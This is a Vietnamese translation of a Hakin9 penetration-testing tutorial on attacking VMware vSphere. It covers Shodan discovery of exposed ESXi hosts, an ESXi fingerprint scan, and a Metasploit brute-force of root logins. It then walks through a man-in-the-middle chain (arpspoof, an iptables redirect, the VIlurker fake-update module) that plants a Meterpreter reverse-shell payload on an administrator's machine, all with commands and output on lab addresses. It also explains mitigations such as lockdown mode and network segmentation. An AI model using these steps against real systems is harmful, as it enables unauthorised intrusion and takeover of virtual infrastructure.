CertMaster Đông Dương

vMware vSphere & Metasploit

Bài chuyển ngữ và có biên tập đôi chút của instrcutor Nguyễn Trần Tường Vinh (CEH Master)

Bài gốc của tác giả Duane Anderson tại đây https://hakin9.org/vmware-vsphere-security-and-metasploit-exploitation-framework/

Khung khai thác Metasploit và Các vấn đề Bảo mật vMware vSphere

Trong bài viết này, bạn sẽ tìm hiểu một số mối đe dọa, cách giảm thiểu chúng và cách tấn công lớp ảo VMware vSphere.

Trong một số năm, tôi đã có đặc ân đi du lịch khắp thế giới trong khi làm việc với một số cá nhân tuyệt vời để cung cấp các đánh giá và đào tạo về bảo mật. Trong những năm gần đây, công việc này đã phát triển từ việc thực hiện các đánh giá bảo mật tiêu chuẩn, pháp y số và chuyển sang tập trung vào bảo mật trong môi trường ảo. Tôi đã được giới thiệu về VMware Hypervisor và các sản phẩm khác nhau của Tim Pierson, một chuyên gia bảo mật đám mây ở Dallas, TX. Làm việc với ảo hóa đã được chứng minh là rất thú vị; tuy nhiên luôn có một mặt trái của vấn đề. Nhiều chủ sở hữu, người quản lý và quản trị viên thường bỏ qua nhu cầu đánh giá tính bảo mật của môi trường VMware vSphere của họ. Vì ảo hóa thường được triển khai trong mạng nội bộ, mức độ rủi ro được coi là thấp và bảo mật xung quanh Hypervisor và vCenter đã bị bỏ qua một cách đáng sợ ! Làm việc với VMTraining để phát triển phần mềm học liệu giúp chúng tôi hiểu những rủi ro vốn có trong môi trường này là một đặc ân thực sự và tôi rất thích được sử dụng công nghệ tiên tiến đã chiếm lĩnh thế giới!

Chúng tôi đang đưa ra những giả định nhất định trong khi viết bài này. Ví dụ: chúng tôi sẽ không đi sâu vào VMware vSphere, Hypervisor hoặc vCenter là gì và chúng tôi hy vọng rằng bạn sẽ có kiến thức làm việc chung về môi trường VMware để hiểu các chủ đề mà chúng tôi sẽ giải thích và trình bày trong bài viết này.

Có một hệ thống Practice Labs Online của Security365 có thể giúp các bạn mau chóng nắm bắt những công nghệ ảo hóa trên môi trường Vmware

Chúng ta sẽ bắt đầu bài viết này bằng cách thảo luận một số lý do tại sao kiến trúc ảo nên được xem như một lớp khác trong góp phần vào bề mặt tấn công tổng thể của môi trường. Trước hết, phần mềm ảo hóa là nền tảng cơ bản của môi trường ảo hóa. Tất cả các máy chủ ảo đều phụ thuộc vào nó và khi có quyền truy cập vào các giao diện quản lý, toàn bộ cơ sở hạ tầng có thể được sở hữu. Tất cả chúng ta đều hiểu rằng ảo hóa có thể được triển khai theo nhiều cách khác nhau, từ một thiết kế đơn giản đến các kiến trúc phức tạp và mạnh mẽ hơn. Bất kể mức độ phức tạp của việc triển khai, chúng đều có các mối đe dọa cần phải được đánh giá. Tôi đã thấy các đợt triển khai mà trong đó hầu hết mọi mối đe dọa đều đã được che đậy và tôi cũng đã thấy các đợt triển khai tiếp xúc với web mà bất kỳ ai cũng dễ dàng truy cập qua công cụ tìm kiếm nguy hiểm http://www.shodan.io .
Nếu bạn không quen thuộc với trang web của shoda, bạn nên dành một chút thời gian để tìm hiểu về các khả năng đằng sau hệ thống ấn tượng này. Một giải thích đơn giản rằng nó là một công cụ tìm kiếm máy chủ. Trong Hình 1, bạn sẽ thấy một tìm kiếm đơn giản cho VMware ESX.

Hình 1. Tìm kiếm Shodan

Hình 2. Kết quả tìm kiếm trên Shodan

Đây là danh sách các máy chủ được kết nối trực tiếp với Internet và Shodan đã tìm thấy chúng. Thật là đáng sợ! Đây không phải là vấ đề bảo mật, bạn có đồng ý không? Mặc dù một số hệ thống này có thể là máy chủ phát triển, nhưng mức độ tiếp xúc này không phải là một ý kiến hay! Khi chúng ta sử dụng trình duyệt để điều hướng đến một trong các địa chỉ IP được tìm thấy với Shodan, chúng ta sẽ thấy như sau trong Hình 3.

Hình 3. Tìm thấy Máy chủ ESXi 5 với Tìm kiếm Shodan

Nhìn rất quen thuộc? Tôi nghĩ họ đang yêu cầu chúng tôi khai thác thế trận an ninh yếu kém của họ! Ok, đó là bất hợp pháp vì vậy xin vui lòng không làm gì khác hơn là nhìn! Có nhiều hacker nghĩ rằng chui vào đó và báo cáo lổ hỗng là hợp pháp ! Thật ra, điều đó hoàn toàn sai, tài liêu chính thức của CEH v11 có nói rõ điều này. Không ai yêu cầu bạn chui vào nhà họ xong rồi bảo rằng họ có thể bị chui vào. Ai mà biết được một khi đã vào bạn đã làm gì hay đã thấy điều gì trong ngôi nhà của một cặp vợ chồng son 😦

Hình 4. Tác động của mối đe dọa đối với ESXi 4.x

Có hàng trăm mối đe dọa liên quan đến môi trường VMware tổng thể, từ các cuộc tấn công vào hypervisor, vCenter, Update Manager, Data Recovery và nhiều mối đe dọa khác. Tôi muốn bạn lưu ý kết quả của các cuộc tấn công trực tiếp vào máy chủ ESXi 4.x trong Hình 4. Khi nhìn vào số liệu thống kê từ Secunia, chúng ta có thể thấy rằng 2 kết quả hàng đầu là Quyền truy cập hệ thống và tấn công DoS! Quyền truy cập hệ thống trên máy chủ ESXi sẽ cho phép kẻ tấn công truy cập mọi thứ trên ! Còn vCenter thì sao? Xem Hình 5 và Hình 6.

Hình 5. Tác động của mối đe dọa trên vCenter Server 4.x

Hình 6. Tác động của mối đe dọa đối với vCenter 5.x

Như bạn có thể thấy, sự tàn phá của các cuộc tấn công chống lại vCenter là đáng kể. Hãy nhớ rằng vụ trộm thẻ tín dụng tồi tệ nhất trong lịch sử được biết đến, bản cáo trạng Gonzalez, xảy ra từ năm 2006-2008 trong một môi trường ảo hóa! Cuộc tấn công được thực hiện chống lại các hệ thống đang chạy trên ESX. Cuối cùng, những kẻ tấn công đã đặt một rootkit trên máy chủ ESX để thu thập thông tin thẻ tín dụng đi qua bộ nhớ máy chủ và CPU. Nói cách khác, họ đã nắm bắt được lưu lượng truy cập của nhiều máy chủ SQL cùng một lúc, dẫn đến việc đánh cắp 140 đến 180 triệu thẻ! Chỉ riêng sự cố này đã cảnh báo về sự cần thiết của việc tăng cường các môi trường ảo của chúng ta.

Những sai lầm phổ biến khi triển khai môi trường ảo hóa

Một số lỗi thường gặp nhất khi triển khai VMware vSphere là gì? Lỗi thường xuyên và nghiêm trọng nhất là thiếu phân đoạn mạng để tách các máy chủ quản lý khỏi phần còn lại của mạng chung. Hình 7 là ảnh chụp màn hình của mạng lớp học được sử dụng để chứng minh các phương pháp thường được sử dụng để triển khai mạng ảo. Lưu ý: khi không sử dụng VLAN. Trong môi trường này, một máy ảo sẽ có quyền truy cập vào tất cả các hệ thống khác trên mạng. Đây không phải là cách mọi thứ nên được thực hiện!

Ngay cả khi chúng ta có một mạng quản lý được phân đoạn với việc sử dụng các vùng của VLAN và vShield, vẫn có một sai lầm phổ biến! Quản trị viên vCenter truy cập vào mạng quản lý như thế nào? Đây là sự cố phổ biến trong môi trường. Tôi đã ngạc nhiên khi có nhiều công ty bỏ qua các thông lệ bảo mật phổ biến trong việc triển khai ảo hóa. Họ đã gia cố mạng và máy chủ windows nhưng bỏ qua ảo hóa. Có bao nhiêu công ty đang đăng nhập vào Hypervisor bằng quyền root và mật khẩu chung mà mọi người dùng đều biết? Thật không may, điều này còn rất phổ biến hơn mặc dù nó đi ngược lại với mọi chính sách tuân thủ từng được viết ra !

Hình 7. Mạng vSphere chung

Khai thác môi trường vSphere

Phần còn lại của bài viết này sẽ xem xét cách khai thác môi trường vSphere bằng cách sử dụng Metasploit làm khuôn khổ. Tạp chí Pentest tháng 7 năm 2012 đã có một bài báo với tiêu đề “Làm việc với Metasploit trong khung khai thác”, trong đó đề cập đến việc nhiều ứng dụng viên áp dụng không tận dụng hết chức năng bổ sung của Metasploit. Chúng tôi sẽ sử dụng các mô-đun phụ trợ đã được tạo và sau đó được thêm vào khung Metasploit cùng với các mô-đun tích hợp sẵn hiện có.

Một số mô-đun tốt nhất trong ngành được sử dụng để tấn công trực tiếp môi trường vSphere đã được tạo ra bởi Claudio Criscione và nhóm của anh ấy! Nghiên cứu và phát triển của Claudio thật tuyệt vời, cung cấp cho chúng tôi những cách khai thác đơn giản để sử dụng giúp chúng tôi tối đa hóa thành công trong việc khai thác. Một trong những mô-đun phụ trợ cho phép chúng tôi tải xuống máy ảo trực tiếp từ máy chủ ESX 3.5 mà không cần thông tin đăng nhập. Yêu thích cá nhân của tôi là khai thác cho phép bạn lấy cắp ID SOAP của một quản trị viên vCenter 4.x hiện có và sau đó chạy phiên của quản trị viên! Không cần bất cứ điều gì ngoài quyền truy cập vào vCenter !!

Chúng tôi sẽ sử dụng các mô-đun phụ do Claudio và nhóm của anh ấy phát triển có tên là VASTO ( Virtualization ASessment TOolkit ). Bạn có thể tải xuống tại http://vasto.nibblesec.org/ . Khi bạn đã tải xuống các mô-đun phụ, bạn có thể sao chép thư mục growo vào thư mục phụ trợ. Hình 8 cho thấy đường dẫn trong Backtrack , bây giờ các bạn đã dùng tới Kali 2021.1 , nhưng cấu trúc nền tảng thì vẫn thế.

Hình 8. Thư mục Metasploit

Đã đến lúc xem xét việc sử dụng các mô-đun phụ trợ của Metasploit Framework để quét và khai thác môi trường vSphere.

Tất cả những minh chứng sau đây đều được cung cấp bởi một đồng nghiệp của tôi, Vincent Hautot. Vincent là một Pentester có tay nghề cao và là huấn luyện viên của Sysdream ( http://www.sysdream.com/ ) ở Paris, Pháp. Sysdream là tổ chức phù hợp cho mọi vấn đề an ninh ở Pháp! Họ là những người sáng lập ra hackerzvoice ( http://www.hackerzvoice.net/ ) và đêm của hacker ( http://www.nuitduhack.com/en ), một hội nghị tuyệt vời đã tiếp tục phát triển mỗi năm! Cảm ơn Vincent đã đóng góp cho bài viết.

Hai minh chứng đầu tiên từ Vincent sử dụng các mô-đun được cung cấp trong Metasploit Framework 4.2. Đảm bảo cập nhật khuôn khổ của bạn với svn up để xác minh rằng bạn có các mô-đun chính xác .

Sau khi Metasploit có tất cả các mô-đun phụ trợ, chúng ta có thể bắt đầu sử dụng chúng! Với Metasploit 5 trên Kali 2021 có lẽ không cần tiến hành những thao tác này, nhưng tôi không chắc lắm. Cuộc trình diễn đầu tiên của chúng tôi sử dụng mô-đun esx_fingerprint của vmware. Khi bạn đã khởi chạy Metasploit trong giao diện bảng điều khiển, hãy chạy lệnh sau:

msf > use auxiliary/scanner/vmware/esx_fingerprint

Xem chi tiết Listing 1.

Listing 1. VMware fingerprint scanner

msf auxiliary(esx_fingerprint) > info

Name: VMWare ESX/ESXi Fingerprint Scanner

Module: auxiliary/scanner/vmware/esx_fingerprint

Version: $Revision$

License: Metasploit Framework License (BSD)

Rank: Normal

Provided by:

TheLightCosine <thelightcosine@metasploit.com>

Basic options:

Name Current Setting Required Description

—- ————— ——– ———–

Proxies no Use a proxy chain

RHOSTS yes The target address range or CIDR identifier

RPORT 443 yes The target port

THREADS 1 yes The number of concurrent threads

URI /sdk no The uri path to test against

VHOST no HTTP server virtual host

Sự miêu tả

Mô-đun này truy cập các giao diện API web cho máy chủ VMware ESX / ESXi và cố gắng xác định thông tin phiên bản cho máy chủ đó.

Mục đích là gì? Mô-đun này được thiết kế để giúp chúng tôi tìm các máy chủ thực tế trên mạng và xác định phiên bản và bản dựng chính xác. Bạn có thể nhập một loạt Địa chỉ IP hoặc một địa chỉ. Trong ví dụ của chúng tôi, chúng tôi đang tìm kiếm dấu vân tay một máy chủ cụ thể mà chúng tôi đã quét bằng NMAP.

Cũng giống như các mô-đun khác, chúng ta cần thiết lập máy chủ từ xa cho hệ thống mà chúng ta đang lấy dấu vân tay. Khi xem chi tiết ở trên, bạn sẽ thấy có ba yêu cầu: RHOSTS, RPORT và THREADS. Hai trong số ba đã được thiết lập với các cài đặt tiêu chuẩn sẽ hoạt động trong môi trường của chúng tôi. Bây giờ, chúng tôi chỉ cần thiết lập RHOSTS và chạy mô-đun:

msf auxiliary(esx_fingerprint) > set RHOSTS 192.168.3.212

RHOSTS => 192.168.3.212

msf auxiliary(esx_fingerprint) > exploit

The results below have identified the host correctly and now we know exactly what we are attacking!

[+] [2012.08.14-10:16:47] Identified VMware ESXi 5.0.0 build-623860

[*] [2012.08.14-10:16:47] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(esx_fingerprint) >

Mô-đun này sử dụng cổng TCP 443 và nếu bạn đọc nguồn của mô-đun này tại: $METASPLOIT_HOME/modules/auxiliary/scanner/vmware/esx_fingerprint.rb bạn có thể tìm thấy sự liên kết của đường dẫn sdk với kết nối https. Phương thức công khai có sẵn với tệp wsdl được hiển thị trong Hình 9.

Hình 9. Chế độ Lockdown

Bây giờ chúng tôi đã xác định được máy chủ và phiên bản, chúng tôi có thể xem xét các phương tiện khai thác có thể có. Có nhiều lựa chọn; tuy nhiên, chúng tôi sẽ gắn bó với phương pháp đã thử và đúng là sử dụng Metasploit để Bruteforce đăng nhập ESXi!

Metasploit đã cung cấp một mô-đun để thực thi tài khoản cục bộ. Mô-đun này sẽ sử dụng một cuộc tấn công từ điển và bạn sẽ cần một tệp từ điển. Tệp có thể là của riêng bạn hoặc bạn có thể sử dụng tệp tích hợp sẵn từ Metasploit được tìm thấy tại $METASPLOIT_HOME/data/wordlist/. Hãy xem chương trình này trên : Liệt kê 2.

Listing 2. Metasploit bruteforce attackt

msf auxiliary(esx_fingerprint) > use auxiliary/scanner/vmware/vmauthd_login

msf auxiliary(vmauthd_login) > info

Name: VMWare Authentication Daemon Login Scanner

Module: auxiliary/scanner/vmware/vmauthd_login

Version: $Revision$

License: Metasploit Framework License (BSD)

Rank: Normal

Provided by:

TheLightCosine <thelightcosine@metasploit.com>

Basic options:

Name Current Setting Required Description

—- ————— ——– ———–

BLANK_PASSWORDS true no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

RHOSTS yes The target address range or CIDR identifier

RPORT 902 yes The target port

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads

USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS true no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE true yes Whether to print output for all attempts

Miêu tả

Mô-đun này sẽ kiểm tra đăng nhập vmauthd trên một loạt máy và báo cáo đăng nhập thành công.

Tham khảo

http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0502 .

Có sáu cài đặt cần thiết để thiết lập cuộc tấn công bruteforce và một số cài đặt khác mà chúng tôi có thể cần thay đổi. Vincent đã bắt đầu ở trên cùng và xác minh tất cả các cài đặt. Thay đổi đầu tiên cần thiết là sử dụng mật khẩu trống:

msf phụ trợ (vmauthd_login)> set BLANK_PASSWORDS false

BLANK_PASSWORDS => false

Vậy tại sao không kiểm tra mật khẩu trống? Nhìn vào phiên bản từ mô-đun vân tay, chúng tôi thấy đây là phiên bản 5 của ESXi. Trong phiên bản 5, bạn bắt buộc phải nhập mật khẩu trong quá trình cài đặt nên khả năng bạn gặp phải mật khẩu trống là rất thấp. Nếu đây là ESXi 4.1 mà không cần mật khẩu trong quá trình cài đặt, chúng tôi sẽ cần kiểm tra các mật khẩu trống. Tốc độ bruteforce là tùy chọn bắt buộc tiếp theo và cài đặt mặc định là nhanh nhất có thể ở mức 5. Cài đặt này phù hợp với phần trình diễn của chúng tôi nhưng có thể cần phải điều chỉnh trong một số môi trường. Như mong đợi, chúng ta cần đặt RHOSTS:

msf auxiliary (vmauthd_login)> set RHOSTS 192.168.2.212

RHOSTS => 192.168.2.212

Tất cả những gì còn lại cho chúng tôi là xác định tên người dùng mà chúng tôi sẽ tấn công. Chúng tôi sẽ cho phép Metasploit sử dụng danh sách mật khẩu của riêng nó:

msf auxiliary (vmauthd_login)> set USERNAME root

USERNAME => root

Bây giờ chúng ta hãy chạy em bé này và xem những gì chúng ta có thể tìm thấy trong (Liệt kê 3).

Listing 3. Bruteforce results

msf auxiliary(vmauthd_login) > exploit

[*] [2012.08.14-10:31:39] 192.168.3.212:902 Banner: 220 VMware Authentication Daemon Version 1.10: SSL Required, ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , VMXARGS supported

[*] [2012.08.14-10:31:39] 192.168.3.212:902 Switching to SSL connection…

[-] [2012.08.14-10:31:42] 192.168.3.212:902 vmauthd login FAILED – root:root

[-] [2012.08.14-10:31:43] 192.168.3.212:902 vmauthd login FAILED – root:123456

[-] [2012.08.14-10:31:45] 192.168.3.212:902 vmauthd login FAILED – root:12345

[-] [2012.08.14-10:31:48] 192.168.3.212:902 vmauthd login FAILED – root:123456789

[+] [2012.08.14-10:31:48] 192.168.3.212:902 vmauthd login SUCCESS – root:password

Chúng tôi đã tìm thấy tên người dùng và mật khẩu hợp lệ. Chúng ta nên áp dụng chính sách mật khẩu đúng.

Đúng như bạn có thể mong đợi, Metasploit làm cho việc này trở nên quá dễ dàng đối với chúng tôi! Đây là tất cả những gì về nó, làm cho công việc của chúng tôi dễ dàng hơn. Chúng tôi chỉ đơn giản là muốn kiểm tra môi trường. Hãy nhớ rằng, một hệ thống được cấu hình đúng sẽ không cho phép cuộc tấn công này xảy ra. Điều này sẽ không thể thực hiện cuộc tấn công này nếu chế độ Lockdown được bật trên mỗi máy chủ!

Bạn có thể hỏi “Còn chế độ khóa này thì sao?” Sau khi máy chủ của bạn được tham gia vCenter, bạn có thể bật chế độ khóa để ngăn các phiên đăng nhập mới xảy ra trên máy chủ. Do đó, chúng tôi thậm chí không thể thực hiện cuộc tấn công này vì không có phiên mới nào được phép. Bạn có thể bật chế độ khóa trên tab cấu hình của máy chủ trong vCenter. Vị trí chính xác là Cấu hình> Hồ sơ bảo mật> Chế độ khóa> Chỉnh sửa .

Nếu bạn lo lắng về việc gặp sự cố do vCenter mất kết nối với máy chủ, thì không cần. Bạn có thể bật / tắt Chế độ Lockdown từ DCUI cũng như trong vCenter (Hình 10). Tuyệt vời – bây giờ chúng tôi sở hữu hộp của bạn vì chế độ khóa bị tắt! Chúng tôi sẽ tiếp tục và xem xét một trong nhiều mô-đun được cung cấp cho bạn trong VASTO.

Hình 10. Chế độ khóa DCUI

Vincent đã chọn tấn công trực tiếp quản trị viên vSphere bằng cách sử dụng một cuộc tấn công MiTM để phá vỡ giao tiếp tiêu chuẩn với vSphere Client. Trong phần trình diễn này, chúng tôi sẽ sử dụng mô-đun phụ trợ của VASTO được gọi là viluker. Lý do cuộc tấn công này sẽ hoạt động là do quá trình giao tiếp từ máy khách vSphere đến vCenter hoặc Máy chủ lưu trữ. Ứng dụng khách vSphere sẽ hỏi máy chủ lưu trữ hoặc vCenter “Phiên bản mới nhất của ứng dụng khách vSphere là gì?” Nếu có phiên bản mới hơn của phần mềm máy khách, máy khách sẽ được thông báo về nơi tải xuống và có thể cập nhật nhanh chóng.

Dưới đây là các địa chỉ IP cho cuộc tấn công được minh họa bên dưới:

Attacker IP: 192.168.130.151

Victim IP: 192.168.130.95

ESXi IP: 192.168.130.13

Vì đây là MiTM attack chúng ta phải chặn traffic giữa victim và ESXi host. Ta sẽ dùng arpspoof:

[root@cehvietnam metasploit]# arpspoof -i p4p1 -t 192.168.130.95 192.168.130.13

We also have to redirect the network connection to the attacker process with the following iptables command:

[root@cehvietnam metasploit]# iptables -t nat -A

PREROUTING -d 192.168.130.13 -p tcp –dport

443 -j DNAT –to-destination 192.168.130.151:443

Một khi tấn công MITM thành công ta có thể định tuyến lại trafic và dùng vilurker exploit (Listing 4).

Listing 4: Metasploit VILurker attack

msf auxiliary(vmware_vilurker) > info

Name: vasto: VIlurker VIclient attack

Module: auxiliary/virt/vmware_vilurker

Version: 0.9

License: GNU Public License v2.0

Rank: Normal

Provided by:

Claudio Criscione

Basic options:

Name Current Setting Required Description

—- ————— ——– ———–

LHOST no The local IP address to listen to.

LPORT no The local port.

PAYLOAD windows/meterpreter/bind_tcp yes The payload to run against the client.

RHOST 192.168.130.95 no The remote host.

RPORT no The remote port.

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 443 yes The local port to listen on.

SSL true yes Use SSL

SSLCert no Path to a custom SSL certificate (default is randomly generated)

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

Miêu tả

Mô-đun này thực hiện cuộc tấn công VIlurker chống lại máy khách trên Cơ sở hạ tầng ảo hoặc VSphere. Máy khách VI sẽ bị lừa tải xuống một bản cập nhật giả sẽ được chạy dưới thông tin đăng nhập của người dùng.

Bạn có nhận thấy trọng tải (payload) không? Có, chúng ta đang sử dụng Meterpreter để tận dụng hệ điều hành Windows. Có một số cài đặt chúng tôi cần thiết lập trước khi khởi chạy khai thác (Liệt kê 5).

Listing 5. VILurker settings

msf auxiliary(vmware_vilurker) > set LHOST 192.168.130.151

LHOST => 192.168.130.151

msf auxiliary(vmware_vilurker) > set LPORT 4444

msf auxiliary(vmware_vilurker) > set LPORT 6567

LPORT => 6567

msf auxiliary(vmware_vilurker) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Ta dùng reverse TCP thay cho phương án bind . Để tạo kết nối ngược như (Listing 6).

Listing 6. VILurker is now waiting

msf auxiliary(vmware_vilurker) > set RPORT 6565

RPORT => 6565

msf auxiliary(vmware_vilurker) > exploit

[*] Auxiliary module execution completed

[*] [2012.08.14-15:49:58] Server started.

msfauxiliary(vmware_vilurker) >

Hãy xem kết quả của quá trình khai thác với các kết nối trong Listing 7.

Listing 7.

[*] [2012.08.14-15:50:09] VIlurker – 192.168.130.95 is asking for clients.xml. Triggering VIlurker

[*] [2012.08.14-15:50:09] answering HTTP/1.1 200 Ok

Host: 192.168.130.151

Content-Type: text/xml

Content-Length: 266

Connection: Close

<downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>

</clientConnection>

</ConfigRoot>

Tiếp theo, victim sẽ phản hồi “yes” để cập nhập vSphere client và attacker sẽ thấy trong Listing 8.

Listing 8.

[*] [2012.08.14-15:50:11] VIlurker – Bingo 192.168.130.95 is asking for the update. Creating the exploit

[*] [2012.08.14-15:50:11] VIlurker – Creating payload…

[*] [2012.08.14-15:50:11] Executing /opt/metasploit/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.130.151 LPORT=6567 X > /root/.msf4/modules/auxiliary/vasto/data/lurker.exe

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: {“LHOST”=>”192.168.130.151”, “LPORT”=>”6567”}

[*] [2012.08.14-15:50:19] 192.168.130.95 uploading exploit

[*] [2012.08.14-15:50:19] VIlurker – Saving session information on the DB

Lúc này, kẻ tấn công sẽ cần phải cấu hình trình xử lý để chấp nhận kết nối từ nạn nhân: Liệt kê 9.

Listing 9. Meterpreter Handler

msf auxiliary(vmware_vilurker) > use exploit/multi/handler

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LPORT 6567

LPORT => 6567

msf exploit(handler) > set LHOST 192.168.130.151

LHOST => 192.168.130.151

msf exploit(handler) > exploit

Tại thời điểm này trong quá trình khai thác, kẻ tấn công đã thiết lập thành công một cuộc tấn công MiTM và thuyết phục Quản trị viên vSphere rằng có bản cập nhật cho Ứng dụng khách vSphere. Sau khi nói có với bản cập nhật, gói được gửi đi và bây giờ nạn nhân phải chọn cài đặt bản cập nhật. Các bản cập nhật luôn tuyệt vời và cần thiết bởi tất cả các quản trị viên! Hình 11 là những gì nạn nhân sẽ thấy trong giai đoạn này.

Hình 11. Nạn nhân chọn cài đặt bản cập nhật

Nạn nhân sẽ cài đặt bản cập nhật thực sự là mô-đun Meterpreter. Sau khi cập nhật xong, quản trị viên sẽ tiếp tục công việc của mình, kết nối với vCenter và có thể không nhận thấy bất cứ điều gì bất thường. Với tư cách là kẻ tấn công, chúng ta sẽ thấy những điều sau:

[*] [2012.08.14-15: 51: 59] Đang gửi giai đoạn (752128 byte) tới 192.168.130.95

[*] Meterpreter session 1 đã mở (192.168.130.151:

6567 -> 192.168.130.95:2980) lúc 2012-08-14 15:52:01 +0200

Bây giờ chúng ta có thể chạy bất kỳ lệnh nào chúng ta thích vì chúng ta sở hữu hộp: Liệt kê 10.

Listing 10. Meterpreter running, game over

meterpreter > ifconfig

Interface 65539

============

Name : Carte AMD PCNET Family Ethernet PCI #2 – Miniport d’ordonnancement de paquets

Hardware MAC : 08:00:27:9f:93:20

MTU : 1500

IPv4 Address : 192.168.130.95

IPv4 Netmask : 255.255.255.0

Tất nhiên, đây chỉ là một trong số rất nhiều ví dụ khi thử nghiệm tư thế bảo mật của môi trường ảo. Khi xem xét các phương pháp ngăn chặn kiểu tấn công này, bạn thường sẽ xem xét cách quản trị viên kết nối với cơ sở hạ tầng ảo, đường dẫn nào đang được sử dụng và các thiết bị khác trên cùng một mạng. Nếu bạn không thể cung cấp mức độ phân đoạn cần thiết để bảo mật mạng nội bộ, với tư cách là quản trị viên, ít nhất bạn phải lưu ý đến bất kỳ bản cập nhật nào bạn đã áp dụng cho vCenter hoặc máy chủ. Bất kỳ bản cập nhật nào từ VMware sẽ cung cấp tài liệu về những gì được cập nhật và ứng dụng khách vSphere sẽ được liệt kê. Nếu chưa có bất kỳ bản cập nhật nào cho ứng dụng khách vSphere, bạn sẽ không bao giờ nhận được thông báo nâng cấp.

Bài viết này cung cấp vừa đủ thông tin để giúp bạn bắt đầu. Hãy dành thời gian để xem xét các khai thác khác được phát triển để tấn công vSphere. Nếu bạn tự phát triển một số, hãy chia sẻ chúng với phần còn lại của thế giới để tất cả chúng ta có thể tạo ra một tương lai an toàn hơn! Chúng tôi chỉ trình bày một số cuộc tấn công có sẵn khi sử dụng Metasploit, tuy nhiên có rất nhiều công cụ khác có sẵn cho chúng tôi khi làm việc trong môi trường này. NMAP có một tập hợp đầy đủ các yêu cầu thử nghiệm để xác định vCenter hoặc ESXi và ESX. Chúng tôi cũng sử dụng Cain and Abel và nhiều công cụ quét khác trên thị trường cho mục đích xác minh. Một điều tất cả chúng ta cần nhớ là khai thác theo chuỗi! Trong môi trường ngày nay, các bản hack một và đã thực hiện không còn hoạt động nữa và chúng ta cần phải liên kết nhiều bản hack với nhau để có được những gì chúng ta đang theo đuổi. Việc hack môi trường ảo cũng không khác gì.

VMtraining và Sysdream (Duane và Vincent) xin cảm ơn bạn đã dành thời gian tìm hiểu thêm một chút về bảo mật trong môi trường ảo. Còn rất nhiều điều chúng tôi muốn chia sẻ với bạn, nhưng điều đó sẽ đòi hỏi tôi và Vincent phải viết toàn bộ một cuốn sách. Tôi không chắc ai trong chúng ta có thời gian. Tuy nhiên, bạn có thể tham dự một trong 5 lớp học ngày của chúng tôi được cung cấp tại Sysdream hoặc bất cứ nơi nào trên thế giới mà bạn có thể tìm thấy các lớp học VMTraining. Chúng tôi mong được gặp bạn vào một ngày không xa.

Duane Anderson / Hakin9